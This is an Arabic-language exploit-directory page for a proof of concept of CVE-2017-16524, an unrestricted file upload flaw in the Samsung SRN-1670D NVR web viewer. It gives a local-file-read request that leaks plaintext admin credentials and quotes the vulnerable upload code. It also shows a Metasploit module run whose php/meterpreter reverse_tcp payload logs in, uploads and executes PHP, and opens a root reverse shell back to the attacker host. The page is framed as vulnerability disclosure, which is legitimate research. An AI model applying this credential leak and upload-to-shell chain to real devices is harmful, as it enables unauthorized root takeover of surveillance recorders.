Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-16524 — ثغرة رفع ملف غير مقيد - Web Viewer 1.0.0.193 على Samsung SRN-1670D | Kitploit
أدوات/GitHubGitHub/realistic-security/cve-2017-16524
أطر الاستغلالتحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubrealistic-security/cve-2017-16524

CVE-2017-16524

ثغرة رفع ملف غير مقيد - Web Viewer 1.0.0.193 على Samsung SRN-1670D

عرض المستودع
41منذ 8 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-16524

اكتشف بواسطة

عمر مزراق - 0xFFFFFF

المنتج المتأثر

مسجلات فيديو الشبكة من سامسونج - عارض الويب 1.0.0.193 على Samsung SRN-1670D

بائع المنتج

هانوا / أمن سامسونج - https://www.hanwhasecurity.com/

نوع الثغرة

ثغرة رفع ملفات غير مقيد

ناقل الهجوم

root@kitploit:~
AccessVector (AV): Network
User Interaction (UI): None
Authentication (Au): Requires single instance

التأثير

root@kitploit:~
Code execution (ROOT)

المكون المتأثر

root@kitploit:~
network_ssl_upload.php (تم اختباره)
network_802_1x1.php (مشتبه به)
network_802_1x2.php (مشتبه به)

الوصف

عارض الويب 1.0.0.193 على جهاز Samsung SRN-1670D يعاني من ثغرة رفع ملفات غير مقيدة: 'network_ssl_upload.php' تسمح للمهاجمين المصادق عليهم عن بُعد برفع وتنفيذ كود PHP تعسفي عبر اسم ملف بامتداد .php، ثم الوصول إليه عبر طلب مباشر للملف في دليل upload/. للمصادقة على هذا الهجوم، يمكن الحصول على بيانات اعتماد واجهة الويب بنص واضح من خلال استغلال ثغرة قراءة الملفات المحلية الحالية المشار إليها باسم CVE-2015-8279، والتي تسمح للمهاجمين عن بُعد بقراءة بيانات اعتماد واجهة الويب عبر طلب URI:

root@kitploit:~
cslog_export.php?path=/root/php_modules/lighttpd/sbin/userpw 

كود المصدر الضعيف (network_ssl_upload.php):

root@kitploit:~
    22 $path = "./upload/";
    23 $file = $_FILES[ "attachFile" ];
    24 $isApply = ( int )$_POST[ "is_apply" ];
    25 $isInstall = ( int )$_POST[ "isInstall" ];
    26 $isCertFlag = ( int )$_POST[ "isCertFlag" ];
    27 
    28 // create socket
    29 $N_message = "";
    30 $sock = mySocket_create($_is_unix_socket);
    31 $connected = mySocket_connect($_is_unix_socket, $sock);
    32 
    33 $loginInfo = new loginInfo();
    34 $retLogin = loginManager( $connected, $sock, null, $loginInfo );
    35 if ( ( $retLogin == true ) && ( $isApply == 2 || $isApply == 3 ) ) {
    36  if ($connected) {
    37   $id = $loginInfo->get_id();
    38   $xmlFile = $id.'_config.xml';
    39   $N_message = "dummy".nvr_command::DELIM;
    40   $N_message .= "userid ".$id.nvr_command::DELIM;
    41   
    42   if ( $isInstall == 1 ) {
    43    // File upload ==============================================================  
    44    if ( $file[ "error" ] 0 ) {
    45     $Error = "Error: ".$file[ "error" ];
    46    } else {
    47     $retFile = @copy( $file[ "tmp_name" ], $path.$file[ "name" ] );
    48    }
    49    // ==========================================================================
    50   }

إثبات المفهوم

وحدة Metasploit: samsung_srv_1670d_upload_exec

root@kitploit:~
msf exploit(samsung_srv_1670d_upload_exec) > show options 

Module options (exploit/multi/http/samsung_srv_1670d_upload_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.1.200      yes       The target address.
   RPORT    80               yes       The target port (TCP).
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.122      yes       The listen address
   LPORT  4358             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Samsung SRN-1670D == 1.0.0.193


msf exploit(samsung_srv_1670d_upload_exec) > exploit -j 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.122:4358 
msf exploit(samsung_srv_1670d_upload_exec) > [*] Obtaining credentails...
[+] Credentials obtained successfully: admin:pass123!
[*] Logging...
[+] Authentication Succeeded
[*] Generating payload[ eRdGKfFJ.php ]...
[*] Uploading payload...
[*] Executing payload...
[*] Sending stage (33986 bytes) to 192.168.1.200
[*] Meterpreter session 3 opened (192.168.1.122:4358 -> 192.168.1.200:55676) at 2017-06-19 11:52:22 +0100

معلومات إضافية

من المحتمل أن نصوصًا أخرى مثل 'network_802_1x1.php' و 'network_802_1x2.php' تتأثر بنفس الثغرة ولكنني لم أختبرها.

المراجع

CVE-2015-8279: http://blog.emaze.net/2016/01/multiple-vulnerabilities-samsung-srn.html

تنزيل الأداة